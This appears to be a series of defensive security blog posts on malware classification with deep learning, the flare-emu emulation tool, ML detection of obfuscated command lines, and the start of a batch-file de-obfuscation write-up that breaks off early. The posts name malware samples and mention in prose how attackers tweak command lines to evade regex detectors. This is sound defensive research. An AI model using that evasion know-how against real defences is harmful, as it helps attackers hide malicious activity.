Since these deep learning models are only looking at the raw bytes without any additional structural, semantic, or syntactic context, how can they possibly be learning what separates goodware from malware? In this blog post, we answer this question by analyzing FireEye’s deep learning-based malware classifier.

Highlights

  • FireEye’s deep learning classifier can successfully identify malware using only the unstructured bytes of the Windows PE file.
  • Import-based features, like names and function call fingerprints, play a significant role in the features learned across all levels of the classifier.
  • Unlike other deep learning application areas, where low-level features tend to generally capture properties across all classes, many of our low-level features focused on very specific sequences primarily found in malware.
  • End-to-end analysis of the classifier identified important features that closely mirror those created through manual feature engineering, which demonstrates the importance of classifier depth in capturing meaningful features.

Background

Before we dive into our analysis, let’s first discuss what a CNN classifier is doing with Windows PE file bytes. Figure 1 shows the high-level operations performed by the classifier while “learning” from the raw executable data. We start with the raw byte representation of the executable, absent any structure that might exist (1). This raw byte sequence is embedded into a high-dimensional space where each byte is replaced with an n-dimensional vector of values (2). This embedding step allows the CNN to learn relationships among the discrete bytes by moving them within the n-dimensional embedding space. For example, if the bytes 0xe0 and 0xe2 are used interchangeably, then the CNN can move those two bytes closer together in the embedding space so that the cost of replacing one with the other is small. Next, we perform convolutions over the embedded byte sequence (3). As we do this across our entire training set, our convolutional filters begin to learn the characteristics of certain sequences that differentiate goodware from malware (4). In simpler terms, we slide a fixed-length window across the embedded byte sequence and the convolutional filters learn the important features from across those windows. Once we have scanned the entire sequence, we can then pool the convolutional activations to select the best features from each section of the sequence (i.e., those that maximally activated the filters) to pass along to the next level (5). In practice, the convolution and pooling operations are used repeatedly in a hierarchical fashion to aggregate many low-level features into a smaller number of high-level features that are more useful for classification. Finally, we use the aggregated features from our pooling as input to a fully-connected neural network, which classifies the PE file sample as either goodware or malware (6).


Figure 1: High-level overview of a convolutional neural network applied to raw bytes from a Windows PE files.

The specific deep learning architecture that we analyze here actually has five convolutional and max pooling layers arranged in a hierarchical fashion, which allows it to learn complex features by combining those discovered at lower levels of the hierarchy. To efficiently train such a deep neural network, we must restrict our input sequences to a fixed length – truncating any bytes beyond this length or using special padding symbols to fill out smaller files. For this analysis, we chose an input length of 100KB, though we have experimented with lengths upwards of 1MB. We trained our CNN model on more than 15 million Windows PE files, 80% of which were goodware and the remainder malware. When evaluated against a test set of nearly 9 million PE files observed in the wild from June to August 2018, the classifier achieves an accuracy of 95.1% and an F1 score of 0.96, which are on the higher end of scores reported by previous work.

In order to figure out what this classifier has learned about malware, we will examine each component of the architecture in turn. At each step, we use either a sample of 4,000 PE files taken from our training data to examine broad trends, or a smaller set of six artifacts from the NotPetya, WannaCry, and BadRabbit ransomware families to examine specific features.

Bytes in (Embedding) Space

The embedding space can encode interesting relationships that the classifier has learned about the individual bytes and determine whether certain bytes are treated differently than others because of their implied importance to the classifier’s decision. To tease out these relationships, we will use two tools: (1) a dimensionality reduction technique called multi-dimensional scaling (MDS) and (2) a density-based clustering method called HDBSCAN. The dimensionality reduction technique allows us to move from the high-dimensional embedding space to an approximation in two-dimensional space that we can easily visualize, while still retaining the overall structure and organization of the points. Meanwhile, the clustering technique allows us to identify dense groups of points, as well as outliers that have no nearby points. The underlying intuition being that outliers are treated as “special” by the model since there are no other points that can easily replace them without a significant change in upstream calculations, while dense clusters of points can be used interchangeably.


Figure 2: Visualization of the byte embedding space using multi-dimensional scaling (MDS) and clustered with hierarchical density-based clustering (HDBSCAN) with clusters (Left) and outliers labeled (Right).

On the left side of Figure 2, we show the two-dimensional representation of our byte embedding space with each of the clusters labeled, along with an outlier cluster labeled as -1. As you can see, the vast majority of bytes fall into one large catch-all class (Cluster 3), while the remaining three clusters have just two bytes each. Though there are no obvious semantic relationships in these clusters, the bytes that were included are interesting in their own right – for instance, Cluster 0 includes our special padding byte that is only used when files are smaller than the fixed-length cutoff, and Cluster 1 includes the ASCII character ‘r.’

What is more fascinating, however, is the set of outliers that the clustering produced, which are shown in the right side of Figure 3.  Here, there are a number of intriguing trends that start to appear. For one, each of the bytes in the range 0x0 to 0x6 are present, and these bytes are often used in short forward jumps or when registers are used as instruction arguments (e.g., eax, ebx, etc.). Interestingly, 0x7 and 0x8 are grouped together in Cluster 2, which may indicate that they are used interchangeably in our training data even though 0x7 could also be interpreted as a register argument. Another clear trend is the presence of several ASCII characters in the set of outliers, including ‘\n’, ‘A’, ‘e’, ‘s’, and ‘t.’ Finally, we see several opcodes present, including the call instruction (0xe8), loop and loopne (0xe0, 0xe2), and a breakpoint instruction (0xcc).

Given these findings, we immediately get a sense of what the classifier might be looking for in low-level features: ASCII text and usage of specific types of instructions.

Deciphering Low-Level Features

The next step in our analysis is to examine the low-level features learned by the first layer of convolutional filters. In our architecture, we used 96 convolutional filters at this layer, each of which learns basic building-block features that will be combined across the succeeding layers to derive useful high-level features. When one of these filters sees a byte pattern that it has learned in the current convolution, it will produce a large activation value and we can use that value as a method for identifying the most interesting bytes for each filter. Of course, since we are examining the raw byte sequences, this will merely tell us which file offsets to look at, and we still need to bridge the gap between the raw byte interpretation of the data and something that a human can understand. To do so, we parse the file using PEFile and apply BinaryNinja’s disassembler to executable sections to make it easier to identify common patterns among the learned features for each filter.

Since there are a large number of filters to examine, we can narrow our search by getting a broad sense of which filters have the strongest activations across our sample of 4,000 Windows PE files and where in those files those activations occur. In Figure 3, we show the locations of the 100 strongest activations across our 4,000-sample dataset. This shows a couple of interesting trends, some of which could be expected and others that are perhaps more surprising. For one, the majority of the activations at this level in our architecture occur in the ‘.text’ section, which typically contains executable code. When we compare the ‘.text’ section activations between malware and goodware subsets, there are significantly more activations for the malware set, meaning that even at this low level there appear to be certain filters that have keyed in on specific byte sequences primarily found in malware. Additionally, we see that the ‘UNKNOWN’ section– basically, any activation that occurs outside the valid bounds of the PE file – has many more activations in the malware group than in goodware. This makes some intuitive sense since many obfuscation and evasion techniques rely on placing data in non-standard locations (e.g., embedding PE files within one another).


Figure 3: Distribution of low-level activation locations across PE file headers and sections. Overall distribution of activations (Left), and activations for goodware/malware subsets (Right). UNKNOWN indicates an area outside the valid bounds of the file and NULL indicates an empty section name.

We can also examine the activation trends among the convolutional filters by plotting the top-100 activations for each filter across our 4,000 PE files, as shown in Figure 4. Here, we validate our intuition that some of these filters are overwhelmingly associated with features found in our malware samples. In this case, the activations for Filter 57 occur almost exclusively in the malware set, so that will be an important filter to look at later in our analysis. The other main takeaway from the distribution of filter activations is that the distribution is quite skewed, with only two filters handling the majority of activations at this level in our architecture. In fact, some filters are not activated at all on the set of 4,000 files we are analyzing.


Figure 4: Distribution of activations over each of the 96 low-level convolutional filters. Overall distribution of activations (Left), and activations for goodware/malware subsets (Right).

Now that we have identified the most interesting and active filters, we can disassemble the areas surrounding their activation locations and see if we can tease out some trends. In particular, we are going to look at Filters 83 and 57, both of which were important filters in our model based on activation value. The disassembly results for these filters across several of our ransomware artifacts is shown in Figure 5.

For Filter 83, the trend in activations becomes pretty clear when we look at the ASCII encoding of the bytes, which shows that the filter has learned to detect certain types of imports. If we look closer at the activations (denoted with a ‘*’), these always seem to include characters like ‘r’, ‘s’, ‘t’, and ‘e’, all of which were identified as outliers or found in their own unique clusters during our embedding analysis.  When we look at the disassembly of Filter 57’s activations, we see another clear pattern, where the filter activates on sequences containing multiple push instructions and a call instruction – essentially, identifying function calls with multiple parameters.

In some ways, we can look at Filters 83 and 57 as detecting two sides of the same overarching behavior, with Filter 83 detecting the imports and 57 detecting the potential use of those imports (i.e., by fingerprinting the number of parameters and usage). Due to the independent nature of convolutional filters, the relationships between the imports and their usage (e.g., which imports were used where) is lost, and that the classifier treats these as two completely independent features.


Figure 5: Example disassembly of activations for filters 83 (Left) and 57 (Right) from ransomware samples. Lines prepended with '*' contain the actual filter activations, others are provided for context.

Aside from the import-related features described above, our analysis also identified some filters that keyed in on particular byte sequences found in functions containing exploit code, such as DoublePulsar or EternalBlue. For instance, Filter 94 activated on portions of the EternalRomance exploit code from the BadRabbit artifact we analyzed. Note that these low-level filters did not necessarily detect the specific exploit activity, but instead activate on byte sequences within the surrounding code in the same function.

These results indicate that the classifier has learned some very specific byte sequences related to ASCII text and instruction usage that relate to imports, function calls, and artifacts found within exploit code. This finding is surprising because in other machine learning domains, such as images, low-level filters often learn generic, reusable features across all classes.

Bird’s Eye View of End-to-End Features

While it seems that lower layers of our CNN classifier have learned particular byte sequences, the larger question is: does the depth and complexity of our classifier (i.e., the number of layers) help us extract more meaningful features as we move up the hierarchy? To answer this question, we have to examine the end-to-end relationships between the classifier’s decision and each of the input bytes. This allows us to directly evaluate each byte (or segment thereof) in the input sequence and see whether it pushed the classifier toward a decision of malware or goodware, and by how much. To accomplish this type of end-to-end analysis, we leverage the SHapley Additive exPlanations (SHAP) framework developed by Lundberg and Lee. In particular, we use the GradientSHAP method that combines a number of techniques to precisely identify the contributions of each input byte, with positive SHAP values indicating areas that can be considered to be malicious features and negative values for benign features.

After applying the GradientSHAP method to our ransomware dataset, we noticed that many of the most important end-to-end features were not directly related to the types of specific byte sequences that we discovered at lower layers of the classifier. Instead, many of the end-to-end features that we discovered mapped closely to features developed from manual feature engineering in our traditional ML models. As an example, the end-to-end analysis on our ransomware samples identified several malicious features in the checksum portion of the PE header, which is commonly used as a feature in traditional ML models. Other notable end-to-end features included the presence or absence of certain directory information related to certificates used to sign the PE files, anomalies in the section table that define the properties of the various sections of the PE file, and specific imports that are often used by malware (e.g., GetProcAddress and VirtualAlloc).

In Figure 6, we show the distribution of SHAP values across the file offsets for the worm artifact of the WannaCry ransomware family. Many of the most important malicious features found in this sample are focused in the PE header structures, including previously mentioned checksum and directory-related features. One particularly interesting observation from this sample, though, is that it contains another PE file embedded within it, and the CNN discovered two end-to-end features related to this. First, it identified an area of the section table that indicated the ‘.data’ section had a virtual size that was more than 10x larger than the stated physical size of the section. Second, it discovered maliciously-oriented imports and exports within the embedded PE file itself. Taken as a whole, these results show that the depth of our classifier appears to have helped it learn more abstract features and generalize beyond the specific byte sequences we observed in the activations at lower layers.


Figure 6: SHAP values for file offsets from the worm artifact of WannaCry. File offsets with positive values are associated with malicious end-to-end features, while offsets with negative values are associated with benign features.

Summary

In this blog post, we dove into the inner workings of FireEye’s byte-based deep learning classifier in order to understand what it, and other deep learning classifiers like it, are learning about malware from its unstructured raw bytes. Through our analysis, we have gained insight into a number of important aspects of the classifier’s operation, weaknesses, and strengths:

  • Import Features: Import-related features play a large role in classifying malware across all levels of the CNN architecture. We found evidence of ASCII-based import features in the embedding layer, low-level convolutional features, and end-to-end features.
  • Low-Level Instruction Features: Several features discovered at the lower layers of our CNN classifier focused on sequences of instructions that capture specific behaviors, such as particular types of function calls or code surrounding certain types of exploits. In many cases, these features were primarily associated with malware, which runs counter to the typical use of CNNs in other domains, such as image classification, where low-level features capture generic aspects of the data (e.g., lines and simple shapes). Additionally, many of these low-level features did not appear in the most malicious end-to-end features.
  • End-to-End Features: Perhaps the most interesting result of our analysis is that many of the most important maliciously-oriented end-to-end features closely map to common manually-derived features from traditional ML classifiers. Features like the presence or absence of certificates, obviously mangled checksums, and inconsistencies in the section table do not have clear analogs to the lower-level features we uncovered. Instead, it appears that the depth and complexity of our CNN classifier plays a key role in generalizing from specific byte sequences to meaningful and intuitive features.

It is clear that deep learning offers a promising path toward sustainable, cutting-edge malware classification. At the same time, significant improvements will be necessary to create a viable real-world solution that addresses the shortcomings discussed in this article. The most important next step will be improving the architecture to include more information about the structural, semantic, and syntactic context of the executable rather than treating it as an unstructured byte sequence. By adding this specialized domain knowledge directly into the deep learning architecture, we allow the classifier to focus on learning relevant features for each context, inferring relationships that would not be possible otherwise, and creating even more robust end-to-end features with better generalization properties.

The content of this blog post is based on research presented at the Conference on Applied Machine Learning for Information Security (CAMLIS) in Washington, DC on Oct. 12-13, 2018. Additional material, including slides and a video of the presentation, can be found on the conference website.

FLARE Script Series: Automating Objective-C Code Analysis with Emulation

This blog post is the next episode in the FireEye Labs Advanced Reverse Engineering (FLARE) team Script Series. Today, we are sharing a new IDAPython library – flare-emu – powered by IDA Pro and the Unicorn emulation framework that provides scriptable emulation features for the x86, x86_64, ARM, and ARM64 architectures to reverse engineers. Along with this library, we are also sharing an Objective-C code analysis IDAPython script that uses it. Read on to learn some creative ways that emulation can help solve your code analysis problems and how to use our new IDAPython library to save you lots of time in the process.

Why Emulation?

If you haven’t employed emulation as a means to solve a code analysis problem, then you are missing out! I will highlight some of its benefits and a few use cases in order to give you an idea of how powerful it can be. Emulation is flexible, and many emulation frameworks available today, including Unicorn, are cross-platform. With emulation, you choose which code to emulate and you control the context under which it is executed. Because the emulated code cannot access the system services of the operating system under which it is running, there is little risk of it causing damage. All of these benefits make emulation a great option for ad-hoc experimentation, problem solving, or automation.

Use Cases

  • Decoding/Decryption/Deobfuscation/Decompress – Often during malicious code analysis you will come across a function used to decode, decompress, decrypt, or deobfuscate some useful data such as strings, configuration data, or another payload. If it is a common algorithm, you may be able to identify it by sight or with a plug-in such as signsrch. Unfortunately, this is not often the case. You are then left to either opening up a debugger and instrumenting the sample to decode it for you, or transposing the function by hand into whatever programming language fits your needs at the time. These options can be time consuming and problematic depending on the complexity of the code and the sample you are analyzing. Here, emulation can often provide a preferable third option. Writing a script that emulates the function for you is akin to having the function available to you as if you wrote it or are calling it from a library. This allows you to reuse the function as many times as it’s needed, with varying inputs, without having to open a debugger. This case also applies to self-decrypting shellcode, where you can have the code decrypt itself for you.
  • Data Tracking – With emulation, you have the power to stop and inspect the emulation context at any time using an instruction hook. Pairing a disassembler with an emulator allows you to pause emulation at key instructions and inspect the contents of registers and memory. This allows you to keep tabs on interesting data as it flows through a function. This can have several applications. As previously covered in other blogs in the FLARE script series, Automating Function Argument Extraction and Automating Obfuscated String Decoding, this technique can be used to track the arguments passed to a given function throughout an entire program. Function argument tracking is one of the techniques employed by the Objective-C code analysis tool introduced later in this post. The data tracking technique could also be employed to track the this pointer in C++ code in order to markup object member references, or the return values from calls to GetProcAddress/dlsym in order to rename the variables they are stored in appropriately. There are many possibilities.

Introducing flare-emu

The FLARE team is introducing an IDAPython library, flare-emu, that marries IDA Pro’s binary analysis capabilities with Unicorn’s emulation framework to provide the user with an easy to use and flexible interface for scripting emulation tasks. flare-emu is designed to handle all the housekeeping of setting up a flexible and robust emulator for its supported architectures so that you can focus on solving your code analysis problems. It currently provides three different interfaces to serve your emulation needs, along with a slew of related helper and utility functions.

  1. emulateRange – This API is used to emulate a range of instructions, or a function, within a user-specified context. It provides options for user-defined hooks for both individual instructions and for when “call” instructions are encountered. The user can decide whether the emulator will skip over, or call into function calls. Figure 1 shows emulateRange used with both an instruction and call hook to track the return value of GetProcAddress calls and rename global variables to the name of the Windows APIs they will be pointing to. In this example, it was only set to emulate from 0x401514 to 0x40153D.  This interface provides an easy way for the user to specify values for given registers and stack arguments. If a bytestring is specified, it is written to the emulator’s memory and the pointer is written to the register or stack variable. After emulation, the user can make use of flare-emu’s utility functions to read data from the emulated memory or registers, or use the Unicorn emulation object that is returned for direct probing in case flare-emu does not expose some functionality you require.

    A small wrapper function for emulateRange, named emulateSelection, can be used to emulate the range of instructions currently highlighted in IDA Pro.


    Figure 1: emulateRange being used to track the return value of GetProcAddress

  2. iterate – This API is used to force emulation down specific branches within a function in order to reach a given target. The user can specify a list of target addresses, or the address of a function from which a list of cross-references to the function is used as the targets, along with a callback for when a target is reached. The targets will be reached, regardless of conditions during emulation that may have caused different branches to be taken. Figure 2 illustrates a set of code branches that iterate has forced to be taken in order to reach its target; the flags set by the cmp instructions are irrelevant.  Like the emulateRange API, options for user-defined hooks for both individual instructions and for when “call” instructions are encountered are provided. An example use of the iterate API is for the function argument tracking technique mentioned earlier in this post.


    Figure 2: A path of emulation determined by the iterate API in order to reach the target address

  3. emulateBytes – This API provides a way to simply emulate a blob of extraneous shellcode. The provided bytes are not added to the IDB and are simply emulated as is. This can be useful for preparing the emulation environment. For example, flare-emu itself uses this API to manipulate a Model Specific Register (MSR) for the ARM64 CPU that is not exposed by Unicorn in order to enable Vector Floating Point (VFP) instructions and register access. Figure 3 shows the code snippet that achieves this. Like with emulateRange, the Unicorn emulation object is returned for further probing by the user in case flare-emu does not expose some functionality required by the user.


    Figure 3: flare-emu using emulateBytes to enable VFP for ARM64

API Hooking

As previously stated, flare-emu is designed to make it easy for you to use emulation to solve your code analysis needs. One of the pains of emulation is in dealing with calls into library functions. While flare-emu gives you the option to simply skip over call instructions, or define your own hooks for dealing with specific functions within your call hook routine, it also comes with predefined hooks for over 80 functions! These functions include many of the common C runtime functions for string and memory manipulation that you will encounter, as well as some of their Windows API counterparts.

Examples

Figure 4 shows a few blocks of code that call a function that takes a timestamp value and converts it to a string. Figure 5 shows a simple script that uses flare-emu’s iterate API to print the arguments passed to this function for each place it is called. The script also emulates a simple XOR decode function and prints the resulting, decoded string. Figure 6 shows the resulting output of the script.


Figure 4: Calls to a timestamp conversion function


Figure 5: Simple example of flare-emu usage


Figure 6: Output of script shown in Figure 5

Here is a sample script that uses flare-emu to track return values of GetProcAddress and rename the variables they are stored in accordingly. Check out our README for more examples and help with flare-emu.

Introducing objc2_analyzer

Last year, I wrote a blog post to introduce you to reverse engineering Cocoa applications for macOS. That post included a short primer on how Objective-C methods are called under the hood, and how this adversely affects cross-references in IDA Pro and other disassemblers. An IDAPython script named objc2_xrefs_helper was also introduced in the post to help fix these cross-references issues. If you have not read that blog post, I recommend reading it before continuing on reading this post as it provides some context for what makes objc2_analyzer particularly useful. A major shortcoming of objc2_xrefs_helper was that if a selector name was ambiguous, meaning that two or more classes implement a method with the same name, the script was unable to determine which class the referenced selector belonged to at any given location in the binary and had to ignore such cases when fixing cross-references.

Now, with emulation support, this is no longer the case. objc2_analyzer uses the iterate API from flare-emu along with instruction and call hooks that perform Objective-C disassembly analysis in order to determine the id and selector being passed for every call to objc_msgSend variants in a binary. As an added bonus, it can also catch calls made to objc_msgSend variants when the function pointer is stored in a register, which is a very common pattern in Clang (the compiler used by modern versions of Xcode). IDA Pro tries to catch these itself and does a pretty good job, but it doesn’t catch them all. In addition to x86_64, support was also added for the ARM and ARM64 architectures in order to support reverse engineering iOS applications. This script supersedes the older objc2_xrefs_helper script, which has been removed from our repo. And, since the script can perform such data tracking in Objective-C code by using emulation, it can also determine whether an id is a class instance or a class object itself. Additional support has been added to track ivars being passed as ids as well. With all this information, Objective-C-style pseudocode comments are added to each call to objc_msgSend variants that represent the method call being made at each location. An example of the script’s capability is shown in Figure 7 and Figure 8.


Figure 7: Objective-C IDB snippet before running objc2_analyzer


Figure 8: Objective-C IDB snippet after running objc2_analyzer

Observe the instructions referencing selectors have been patched to instead reference the implementation function itself, for easy transition. The comments added to each call make analysis much easier. Cross-references from the implementation functions are also created to point back to the objc_msgSend calls that reference them as shown in Figure 9.


Figure 9: Cross-references added to IDB for implementation function

It should be noted that every release of IDA Pro starting with 7.0 have brought improvements to Objective-C code analysis and handling. However, at the time of writing, the latest version of IDA Pro being 7.2, there are still shortcomings that are mitigated using this tool as well as the immensely helpful comments that are added. objc2_analyzer is available, along with our other IDA Pro plugins and scripts, at our GitHub page.

Conclusion

flare-emu is a flexible tool to include in your arsenal that can be applied to a variety of code analysis problems. Several example problems were presented and solved using it in this blog post, but this is just a glimpse of its possible applications. If you haven’t given emulation a try for solving your code analysis problems, we hope you will now consider it an option. And for all, we hope you find value in using these new tools!

Obfuscated Command Line Detection Using Machine Learning

This blog post presents a machine learning (ML) approach to solving an emerging security problem: detecting obfuscated Windows command line invocations on endpoints. We start out with an introduction to this relatively new threat capability, and then discuss how such problems have traditionally been handled. We then describe a machine learning approach to solving this problem and point out how ML vastly simplifies development and maintenance of a robust obfuscation detector. Finally, we present the results obtained using two different ML techniques and compare the benefits of each.

Introduction

Malicious actors are increasingly “living off the land,” using built-in utilities such as PowerShell and the Windows Command Processor (cmd.exe) as part of their infection workflow in an effort to minimize the chance of detection and bypass whitelisting defense strategies. The release of new obfuscation tools makes detection of these threats even more difficult by adding a layer of indirection between the visible syntax and the final behavior of the command. For example, Invoke-Obfuscation and Invoke-DOSfuscation are two recently released tools that automate the obfuscation of Powershell and Windows command lines respectively.

The traditional pattern matching and rule-based approaches for detecting obfuscation are difficult to develop and generalize, and can pose a huge maintenance headache for defenders. We will show how using ML techniques can address this problem.

Detecting obfuscated command lines is a very useful technique because it allows defenders to reduce the data they must review by providing a strong filter for possibly malicious activity. While there are some examples of “legitimate” obfuscation in the wild, in the overwhelming majority of cases, the presence of obfuscation generally serves as a signal for malicious intent.

Background

There has been a long history of obfuscation being employed to hide the presence of malware, ranging from encryption of malicious payloads (starting with the Cascade virus) and obfuscation of strings, to JavaScript obfuscation. The purpose of obfuscation is two-fold:

  • Make it harder to find patterns in executable code, strings or scripts that can easily be detected by defensive software.
  • Make it harder for reverse engineers and analysts to decipher and fully understand what the malware is doing.

In that sense, command line obfuscation is not a new problem – it is just that the target of obfuscation (the Windows Command Processor) is relatively new. The recent release of tools such as Invoke-Obfuscation (for PowerShell) and Invoke-DOSfuscation (for cmd.exe) have demonstrated just how flexible these commands are, and how even incredibly complex obfuscation will still run commands effectively.

There are two categorical axes in the space of obfuscated vs. non-obfuscated command lines: simple/complex and clear/obfuscated (see Figure 1 and Figure 2). For this discussion “simple” means generally short and relatively uncomplicated, but can still contain obfuscation, while “complex” means long, complicated strings that may or may not be obfuscated. Thus, the simple/complex axis is orthogonal to obfuscated/unobfuscated. The interplay of these two axes produce many boundary cases where simple heuristics to detect if a script is obfuscated (e.g. length of a command) will produce false positives on unobfuscated samples. The flexibility of the command line processor makes classification a difficult task from an ML perspective.


Figure 1: Dimensions of obfuscation


Figure 2: Examples of weak and strong obfuscation

Traditional Obfuscation Detection

Traditional obfuscation detection can be split into three approaches. One approach is to write a large number of complex regular expressions to match the most commonly abused syntax of the Windows command line. Figure 3 shows one such regular expression that attempts to match ampersand chaining with a call command, a common pattern seen in obfuscation. Figure 4 shows an example command sequence this regex is designed to detect.


Figure 3: A common obfuscation pattern captured as a regular expression


Figure 4: A common obfuscation pattern (calling echo in obfuscated fashion in this example)

There are two problems with this approach. First, it is virtually impossible to develop regular expressions to cover every possible abuse of the command line. The flexibility of the command line results in a non-regular language, which is feasible yet impractical to express using regular expressions. A second issue with this approach is that even if a regular expression exists for the technique a malicious sample is using, a determined attacker can make minor modifications to avoid the regular expression. Figure 5 shows a minor modification to the sequence in Figure 4, which avoids the regex detection.


Figure 5: A minor change (extra carets) to an obfuscated command line that breaks the regular expression in Figure 3

The second approach, which is closer to an ML approach, involves writing complex if-then rules. However, these rules are hard to derive, are complex to verify, and pose a significant maintenance burden as authors evolve to escape detection by such rules. Figure 6 shows one such if-then rule.


Figure 6: An if-then rule that *may* indicate obfuscation (notice how loose this rule is, and how false positives are likely)

A third approach is to combine regular expressions and if-then rules. This greatly complicates the development and maintenance burden, and still suffers from the same weaknesses that make the first two approaches fragile. Figure 7 shows an example of an if-then rule with regular expressions. Clearly, it is easy to appreciate how burdensome it is to generate, test, maintain and determine the efficacy of such rules.


Figure 7: A combination of an if-then rule with regular expressions to detect obfuscation (a real hand-built obfuscation detector would consist of tens or hundreds of rules and still have gaps in its detection)

The ML Approach – Moving Beyond Pattern Matching and Rules

Using ML simplifies the solution to these problems. We will illustrate two ML approaches: a feature-based approach and a feature-less end-to-end approach.

There are some ML techniques that can work with any kind of raw data (provided it is numeric), and neural networks are a prime example. Most other ML algorithms require the modeler to extract pertinent information, called features, from raw data before they are fed into the algorithm. Some examples of this latter type are tree-based algorithms, which we will also look at in this blog (we described the structure and uses of Tree-Based algorithms in a previous blog post, where we used a Gradient-Boosted Tree-Based Model).

ML Basics – Neural Networks

Neural networks are a type of ML algorithm that have recently become very popular and consist of a series of elements called neurons. A neuron is essentially an element that takes a set of inputs, computes a weighted sum of these inputs, and then feeds the sum into a non-linear function. It has been shown that a relatively shallow network of neurons can approximate any continuous mapping between input and output. The specific type of neural network we used for this research is what is called a Convolutional Neural Network (CNN), which was developed primarily for computer vision applications, but has also found success in other domains including natural language processing. One of the main benefits of a neural network is that it can be trained without having to manually engineer features.

Featureless ML

While neural networks can be used with feature data, one of the attractions of this approach is that it can work with raw data (converted into numeric form) without doing any feature design or extraction. The first step in the model is converting text data into numeric form. We used a character-based encoding where each character type was encoded by a real valued number. The value was automatically derived during training and conveys semantic information about the relationships between characters as they apply to cmd.exe syntax.

Feature-Based ML

We also experimented with hand-engineered features and a Gradient Boosted Decision Tree algorithm. The features developed for this model were largely statistical in nature – derived from the presence and frequency of character sets and keywords. For example, the presence of dozens of ‘%’ characters or long, contiguous strings might contribute to detecting potential obfuscation. While any single feature will not perfectly separate the two classes, a combination of features as present in a tree-based model can learn flexible patterns in the data. The expectation is that those patterns are robust and can generalize to future obfuscation variants.

Data and Experiments

To develop our models, we collected non-obfuscated data from tens of thousands of endpoint events and generated obfuscated data using a variety of methods in Invoke-DOSfuscation. We developed our models using roughly 80 percent of the data as training data, and tested them on the remaining 20 percent. We ensured that our train-test split was stratified. For featureless ML (i.e. neural networks), we simply input Unicode code points into the first layer of the CNN model. The first layer converts the code point into semantically meaningful numerical representations (called embeddings) before feeding it into the rest of the neural network.

For the Gradient Boosted Tree method, we generated a number of features from the raw command lines. The following are some of them:

  • Length of the command line
  • The number of carets in the command line
  • The count of pipe symbols
  • The fraction of white space in the command line
  • The fraction of special characters
  • Entropy of the string
  • The frequency of the strings “cmd” and “power” in the command line

While each of these features individually is a weak signal and could not possibly be a good discriminator on its own, a flexible classifier such as a Gradient Boosted Tree – trained on sufficient data with these features – is able to classify obfuscated and non-obfuscated command lines in spite of the aforementioned difficulties.

Results

Evaluated against our test set, we were able to get nearly identical results from our Gradient Boosted Tree and neural network models.

The results for the GBT model were near perfect with metrics such as F1-score, precision, and recall all being close to 1.0. The CNN model was slightly less accurate.

While we certainly do not expect perfect results in a real-world scenario, these lab results were nonetheless encouraging. Recall that all of our obfuscated examples were generated by one source, namely the Invoke-DOSfuscation tool. While Invoke-DOSfuscation generates a wide variety of obfuscated samples, in the real world we expect to see at least some samples that are quite dissimilar from any that Invoke-DOSfuscation generates. We are currently collecting real world obfuscated command lines to get a more accurate picture of the generalizability of this model on obfuscated samples from actual malicious actors. We expect that command obfuscation, similar to PowerShell obfuscation before it, will continue to emerge in new malware families.

As an additional test we asked Daniel Bohannon (author of Invoke-DOSfuscation, the Windows command line obfuscation tool) to come up with obfuscated samples that in his experience would be difficult for a traditional obfuscation detector. In every case, our ML detector was still able to detect obfuscation. Some examples are shown in Figure 8.


Figure 8: Some examples of obfuscated text used to test and attempt to defeat the ML obfuscation detector (all were correctly identified as obfuscated text)

We also created very cryptic looking texts that, although valid Windows command lines and non-obfuscated, appear slightly obfuscated to a human observer. This was done to test efficacy of the detector with boundary examples. The detector was correctly able to classify the text as non-obfuscated in this case as well. Figure 9 shows one such example.


Figure 9: An example that appears on first glance to be obfuscated, but isn't really and would likely fool a non-ML solution (however, the ML obfuscation detector currently identifies it as non-obfuscated)

Finally, Figure 10 shows a complicated yet non-obfuscated command line that is correctly classified by our obfuscation detector, but would likely fool a non-ML detector based on statistical features (for example a rule-based detector with a hand-crafted weighing scheme and a threshold, using features such as the proportion of special characters, length of the command line or entropy of the command line).


Figure 10: An example that would likely be misclassified by an ML detector that uses simplistic statistical features; however, our ML obfuscation detector currently identifies it as non-obfuscated

CNN vs. GBT Results

We compared the results of a heavily tuned GBT classifier built using carefully selected features to those of a CNN trained with raw data (featureless ML). While the CNN architecture was not heavily tuned, it is interesting to note that with samples such as those in Figure 10, the GBT classifier confidently predicted non-obfuscated with a score of 19.7 percent (the complement of the measure of the classifier’s confidence in non-obfuscation). Meanwhile, the CNN classifier predicted non-obfuscated with a confidence probability of 50 percent – right at the boundary between obfuscated and non-obfuscated. The number of misclassifications of the CNN model was also more than that of the Gradient Boosted Tree model. Both of these are most likely the result of inadequate tuning of the CNN, and not a fundamental shortcoming of the featureless approach.

Conclusion

In this blog post we described an ML approach to detecting obfuscated Windows command lines, which can be used as a signal to help identify malicious command line usage. Using ML techniques, we demonstrated a highly accurate mechanism for detecting such command lines without resorting to the often inadequate and costly technique of maintaining complex if-then rules and regular expressions. The more comprehensive ML approach is flexible enough to catch new variations in obfuscation, and when gaps are detected, it can usually be handled by adding some well-chosen evader samples to the training set and retraining the model.

This successful application of ML is yet another demonstration of the usefulness of ML in replacing complex manual or programmatic approaches to problems in computer security. In the years to come, we anticipate ML to take an increasingly important role both at FireEye and in the rest of the cyber security industry.

Cmd and Conquer: De-DOSfuscation with flare-qdb

When Daniel Bohannon released his excellent DOSfuscation paper, I was fascinated to see how tricks I used as a systems engineer could help attackers evade detection. I didn’t have much to contribute to this conversation until I had to analyze a hideously obfuscated batch file as part of my job on the FLARE malware queue.

Previously, I released flare-qdb, which is a command-line and Python-scriptable debugger based on Vivisect. I previously wrote about how to use flare-qdb to instrument and modify malware behavior. Flare-qdb also made a guest appearance in Austin Baker and Jacob Christie’s SANS DFIR Summit 2017 briefing, inducing the Windows event log service to exclude process creation events. In this blog post, I will show how I used flare-qdb to bring “script block logging” to the Windows command interpreter. I will also share an Easter Egg that I found by flipping only a single bit in the process address space of cmd.exe. Finally, I will share the script that I added to flare-qdb so you can de-obfuscate malicious command scripts yourself by executing them (in a safe environment, of course). But first, I’ll talk about the analysis that led me to this solution.

At First Glance

Figure 1 shows a batch script (MD5 hash 6C8129086ECB5CF2874DA7E0C855F2F6) that has been obfuscated using the BatchEncryption tool referenced in Daniel Bohannon’s paper. This file does not appear in VirusTotal as of this writing, but its dropper does (the MD5 hash is ABD0A49FDA67547639EEACED7955A01A). My goal was to de-obfuscate this script and report on what the attacker was doing.


Figure 1: Contents of XYNT.bat

This 165k batch file is dropped as C:\Windows\Temp\XYNT.bat and executed by its dropper. Its commands are built from environment variable substrings. Figure 2 shows how to use the ECHO command to decode the first command.


